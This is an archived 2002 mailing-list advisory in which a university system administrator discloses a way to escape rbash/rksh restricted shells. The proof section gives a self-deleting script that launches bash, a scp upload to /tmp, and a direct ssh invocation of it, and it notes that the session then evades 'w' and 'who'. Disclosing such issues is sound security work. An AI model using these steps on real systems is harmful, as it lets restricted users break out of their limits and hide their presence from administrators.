('binary' encoding is not supported, stored as-is) I have recently realized a security issue in some of the restricted shells on *NIX systems. I am not sure if I am the first one to discover the problem I am going to discuss but I am sure that it has not been posted yet, atleast not that I know of. Basically this is the issue: Affected Systems: ================= Any Unix systems that I am aware of using restricted shells (rbash, rksh) Description: ============ An authorized user is that is set to use rbash or rksh is able to escape the restricted shell environment and then furthermore exploit the system. The problem comes from the fact thatwhen a command is executed from the shell and it is found to be a shell procedure then rksh or rbash are invoked to execute it. Proof: ====== One needs to store the shell script in a world-writable directory like /tmp or /usr/tmp so let's assume the server is running sshd (This is also exploitable through rsh). In this case store in a file called anything you want (I will use .tmp123) the following: --- /usr/bin/bash rm -Rf /tmp/.tmp123 --- Then execute the following: $scp ./.tmp123 user@host:/tmp user@host's password: Done. $ssh -l user host '/tmp/.tmp123' user@host's password: _ You should now have a normal bash shell instead of the original rbash. Also a great plus to doing this is that whenever you follow the procedure above the commands 'w' and 'who' cannot detect your presence. However 'ps' dows show the intruder's presence. Fix: ==== I am not aware of any except maybe an attempt to retune the system. If anyone has any ideas please e-mail me. A. Dimitrov System Administrator Georgia College & State University
This archive was generated by hypermail 2b30 : Thu Apr 18 2002 - 17:38:34 PDT